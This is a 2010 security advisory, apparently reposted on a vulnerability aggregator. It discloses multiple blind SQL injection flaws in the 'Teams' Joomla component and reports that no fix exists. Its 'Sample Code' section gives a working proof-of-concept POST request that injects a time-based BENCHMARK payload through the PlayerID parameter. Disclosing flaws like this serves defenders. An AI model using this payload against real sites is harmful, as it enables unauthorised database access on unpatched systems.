Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24484
HistoryAug 12, 2010 - 12:00 a.m.

Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities

2010-08-1200:00:00
vulners.com
32

Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities

Name Teams
Vendor http://www.joomlamo.com
Versions Affected 1_1028_100809_1711

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION


Teams is a base application for entering leagues, teams,
players, uniforms, and games.

II. DESCRIPTION


Some parameters are not properly sanitised before being
used in SQL queries.

III. ANALYSIS


Summary:

A) Multiple Blind SQL Injection

A) Multiple Blind SQL Injection


Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

IV. SAMPLE CODE


A) Multiple Blind SQL Injection

POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205

FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player

V. FIX


No fix.